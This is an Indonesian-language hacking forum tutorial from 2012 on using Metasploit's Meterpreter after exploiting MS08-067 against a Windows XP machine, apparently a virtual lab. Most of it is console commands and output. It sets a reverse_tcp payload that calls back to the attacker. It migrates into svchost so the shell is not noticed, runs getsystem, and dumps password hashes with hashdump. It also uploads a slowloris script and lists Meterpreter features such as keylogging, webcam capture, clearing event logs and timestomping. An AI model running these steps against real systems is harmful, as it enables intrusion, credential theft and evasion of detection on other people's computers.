Lama gk jumpa yah dengan saya Renzrawk =)
sambil ngabuburit nungguin buka gk ada salah nya mending sharing ya ^_^
okey kemaren saya telah menjelaskan basic dari exploit dengan menggunakan metasploit nah ,,
Ini adalah kelanjutan dari exploit yang kemarin sesi ini namanya "Meterpreter"
Meterpreter adalah interaksi shell untuk menghubungkan antara kompi korban dengan kompi host/kita :D
Jika kalo si attacker udah dapet Sesi meter ini berarti sudah cukup berhasil untuk meremote kompi korban =D
ini adalah logika meterpreter di Metasploit
okey !
Let's Do It :D
Pertama - tama kita gunakan exploit yang di tutor kemaren untuk masuk Kekomputer korban
Code:
_ _/ \ / \ __ _ __ /_/ __| |\ / | _____ \ \ ___ _____ | | / \ _ \ \| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -||_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_ |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
=[ metasploit v4.4.0-release [core:4.4 api:1.0]+ -- --=[ 909 exploits - 493 auxiliary - 150 post+ -- --=[ 250 payloads - 28 encoders - 8 nops =[ svn r15673 updated today (2012.07.21)
msf > search netapi
Matching Modules================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms03_049_netapi 2003-11-11 00:00:00 UTC good Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 00:00:00 UTC good Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 00:00:00 UTC manual Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.3RHOST => 192.168.1.3msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set LHOST 192.168.1.2LHOST => 192.168.1.2msf exploit(ms08_067_netapi) > set LPORT 4444LPORT => 4444msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.3 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST 192.168.1.2 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.2:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.3[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1065) at 2012-07-22 13:55:46 +0700
Okey pada command di atas kita tau kita sudah berhasil masuk ke meterpreter :D
untuk melihat apa saja yg sedang run di kompi target ketik di meterpreter "PS"
okey
check this out !
Code:
meterpreter > ps
Process List============
PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86 0 NT AUTHORITY\SYSTEM 216 708 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe 568 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 640 568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 644 2040 VBoxTray.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\WINDOWS\system32\VBoxTray.exe 664 568 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 708 664 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 720 664 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 880 708 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe 924 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 1028 708 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1068 2040 AvastUI.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\Program Files\AVAST Software\Avast\avastUI.exe 1124 708 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1244 708 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1320 708 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe 1468 708 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\AVAST Software\Avast\AvastSvc.exe 1552 708 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1724 708 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre6\bin\jqs.exe 1984 1124 wscntfy.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\WINDOWS\system32\wscntfy.exe 2040 2008 explorer.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\WINDOWS\Explorer.EXE 2056 2040 jusched.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\Program Files\Common Files\Java\Java Update\jusched.exe 2064 1124 wuauclt.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\WINDOWS\system32\wuauclt.exe 2648 2040 cmd.exe x86 0 VICTIMSX-3338CC\Victims-XP C:\WINDOWS\system32\cmd.exe
Okey pada saat kita lihat ada banyak sekali yang running intinya kita disini lihat yang run dari system32
agar mudah migrate nya ke shell32 ntar nya =D
Code:
924 708 svchost.exe AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
nah sudah keliatan ini perhentian kita selanjut nya :D
Migrating / Migrate = untuk berpindah nya remote shell kita di tempat yg lebih kita percaya tidak akan tercurigai
Code:
meterpreter > migrate 924[*] Migrating to 924...[*] Migration completed successfully.meterpreter > pwdC:\WINDOWS\system32
Okey kita sudah berpindah tempat ke dir C:\WINDOWS\system32
Selanjutnya mendapatkan hak penuh dengan masuk sebagai administator
Code:
meterpreter > getuid Server username: NT AUTHORITY\SYSTEMmeterpreter > getsystem ...got system (via technique 1).
getuid = untuk mengetahui kita login sbagai apa =D
getsystem = teknik untuk mendapat system agar kita login sbagai admin
Okey selanjut nya mendump target
Code:
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:d2bef7a3305f461a23f262786be22f4f:5cfef88cd32ccaf3e7bf988f891d5b8c:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:62af8d89e3d57eb307c63ab20b3cda68:::username1:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::username2:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::username3:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::username4:1007:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::username5:1008:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Victims-XP:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Hashdump : untuk mendumping user di dalam komputer
Code:
meterpreter > ifconfig
Interface 1============Name : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU : 1520IPv4 Address : 127.0.0.1IPv4 Netmask : 255.0.0.0
Interface 2============Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler MiniportHardware MAC : 08:00:27:39:cd:b1MTU : 1500IPv4 Address : 192.168.1.3IPv4 Netmask : 255.255.255.0
ifconfig = untuk mengatahui spec koneksi target
Code:
meterpreter > upload /root/rawk/slowloris.pl E:\[*] uploading : /root/rawk/slowloris.pl -> E:\[*] uploaded : /root/rawk/slowloris.pl -> E:\\slowloris.plmeterpreter > download E:\slowloris.pl /root/rawk/[*] downloading: E:slowloris.pl -> /root/rawk//E:slowloris.pl[*] downloaded : E:slowloris.pl -> /root/rawk//E:slowloris.pl
upload = mengirim data ke target
download = mengambil data dari target
NOTE ! dir harus benar =D
Code:
meterpreter > sysinfo Computer : VICTIMSX-3338CCOS : Windows XP (Build 2600, Service Pack 2).Architecture : x86System Language : en_USMeterpreter : x86/win32
sysinfo = untuk mengetahui system info target
Code:
?
Core Commands=============
Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel
Stdapi: File system Commands============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Stdapi: Networking Commands===========================
Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands=======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop
Stdapi: Webcam Commands=======================
Command Description ------- ----------- webcam_list List webcams webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands======================
Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands================================
Command Description ------- ----------- hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands========================
Command Description ------- ----------- timestomp Manipulate file MACE attributes
? /help = panduan untuk mengunakan meterpreter ^_^
okey sampai disini dulu ah :D
kalo ada pertanyaan pm saya aja di ym >> renzrawk
semoga bermanfaat dan selamat Berpuasa yaaaaaaa ;D
Regards : Renzrawk
